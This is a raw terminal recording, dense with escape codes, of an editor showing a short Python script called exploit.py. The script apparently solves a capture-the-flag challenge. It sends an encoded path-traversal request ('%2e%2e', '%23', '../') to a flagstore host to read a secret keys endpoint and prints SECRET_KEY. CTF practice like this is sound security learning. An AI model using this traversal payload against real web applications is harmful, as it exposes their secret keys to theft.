[?1049h[22;0;0t[?1h=[H[2J]11;?[?2004h[?u[c[?25h[?25l(B[m[H[2J]112[2 q[?1002h[?1006h[38;2;220;215;186m[48;2;31;31;40m[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K
[J[H]112[2 q[?25h[?25l(B[0;1m[3m[38;2;255;188;3m[48;2;31;31;40m [1;3H (B[0;1m[3m[38;2;220;215;186m[48;2;31;31;40mexploit.py(B[0;1m[3m[38;2;232;36;36m[48;2;31;31;40m [1;16H (B[0;1m[3m[38;2;220;215;186m[48;2;31;31;40m (B[m[38;2;31;31;40m[48;2;22;22;29m (B[m[38;2;220;215;186m[48;2;22;22;29m[K

(B[m[38;2;84;84;109m[48;2;42;42;55m   8 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;228;104;118m[48;2;31;31;40mimport(B[m[38;2;220;215;186m[48;2;31;31;40m requests[K
(B[m[38;2;84;84;109m[48;2;42;42;55m   7 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;220;215;186m[48;2;31;31;40m[K
(B[m[38;2;84;84;109m[48;2;42;42;55m   6 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;220;215;186m[48;2;31;31;40mBASE_URL = (B[m[38;2;152;187;108m[48;2;31;31;40m"http://flagstore.sstf.site:8000/"(B[m[38;2;220;215;186m[48;2;31;31;40m[K
(B[m[38;2;84;84;109m[48;2;42;42;55m   5 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;220;215;186m[48;2;31;31;40m[K
(B[m[38;2;84;84;109m[48;2;42;42;55m[7;2H  4 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;220;215;186m[48;2;31;31;40mresp = requests.get([K
(B[m[38;2;84;84;109m[48;2;42;42;55m   3 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;220;215;186m[48;2;31;31;40m    BASE_URL + (B[m[38;2;152;187;108m[48;2;31;31;40m"/api/order/%2e%2e/_secret/keys%23/../../../../api"(B[m[38;2;220;215;186m[48;2;31;31;40m[K
(B[m[38;2;84;84;109m[48;2;42;42;55m   2 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;220;215;186m[48;2;31;31;40m).json()[K
(B[m[38;2;84;84;109m[48;2;42;42;55m   1 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;220;215;186m[48;2;31;31;40m[K
(B[m[38;2;84;84;109m[48;2;42;42;55m (B[0;1m[38;2;255;158;59m[48;2;42;42;55m  9 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;126;156;216m[48;2;54;54;70mprint(B[0;1m[38;2;255;158;59m[48;2;54;54;70m((B[m[38;2;220;215;186m[48;2;54;54;70mresp.text(B[0;1m[38;2;255;158;59m[48;2;54;54;70m)(B[m[38;2;220;215;186m[48;2;54;54;70m[K
(B[m[38;2;84;84;109m[48;2;42;42;55m   1 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;220;215;186m[48;2;31;31;40m[K
(B[m[38;2;84;84;109m[48;2;42;42;55m   2 (B[m[38;2;147;138;169m[48;2;42;42;55m  (B[m[38;2;126;156;216m[48;2;31;31;40mprint(B[m[38;2;220;215;186m[48;2;31;31;40m(resp.keys.SECRET_KEY)[K(B[m[38;2;31;31;40m[48;2;31;31;40m
[K
[K
[K
[K
[K
[K
[K
[K
[K
[K(B[m[38;2;200;192;147m[48;2;31;31;40m[21A[K[22B(B[m[38;2;22;22;29m[48;2;126;156;216m (B[m[38;2;126;156;216m[48;2;22;22;29m  (B[m[38;2;255;188;3m[48;2;22;22;29m [24;6H (B[m[38;2;200;192;147m[48;2;22;22;29mpython(B[m[38;2;22;22;29m[48;2;22;22;29m  (B[m[38;2;200;192;147m[48;2;22;22;29m                                                (B[m[38;2;22;22;29m[48;2;22;22;29m  (B[m[38;2;200;192;147m[48;2;22;22;29m  9:16 81%(B[m[38;2;122;168;159m[48;2;22;22;29m ▆[24;77H▆[24;78H(B[m[38;2;126;156;216m[48;2;22;22;29m  (B[m[38;2;22;22;29m[48;2;126;156;216m [11;23H[?25h[?25l[?1004h[?25h[?25l(B[m[38;2;200;192;147m[48;2;22;22;29m[13B[J[11;23H[?25h[?25l[8;8H(B[m[38;2;84;84;109m[48;2;31;31;40m▏[8;9H   [16B(B[m[38;2;22;22;29m[48;2;126;156;216m (B[m[38;2;126;156;216m[48;2;22;22;29m  (B[m[38;2;255;188;3m[48;2;22;22;29m [24;6H (B[m[38;2;200;192;147m[48;2;22;22;29mpython(B[m[38;2;22;22;29m[48;2;22;22;29m  (B[m[38;2;200;192;147m[48;2;22;22;29m                              (B[m[38;2;22;22;29m[48;2;22;22;29m  (B[m[38;2;200;192;147m[48;2;22;22;29m[24;48H  black, flake8(B[m[38;2;22;22;29m[48;2;22;22;29m  (B[m[38;2;200;192;147m[48;2;22;22;29m  9:16 81%(B[m[38;2;122;168;159m[48;2;22;22;29m ▆[24;77H▆[24;78H(B[m[38;2;126;156;216m[48;2;22;22;29m  (B[m[38;2;22;22;29m[48;2;126;156;216m [11;23H[?25h[?25l[24;18H(B[m[38;2;22;22;29m[48;2;22;22;29m  (B[m[38;2;200;192;147m[48;2;22;22;29m[24;21H diagnostics_on_open (0%) [11;23H[?25h[?25l[24;18H                   (B[m[38;2;22;22;29m[48;2;22;22;29m  (B[m[38;2;200;192;147m[48;2;22;22;29m[24;40H  pyright, black, flak…[11;23H[?25h[?25l(B[m[38;2;220;215;186m[48;2;73;68;60mtext[?25h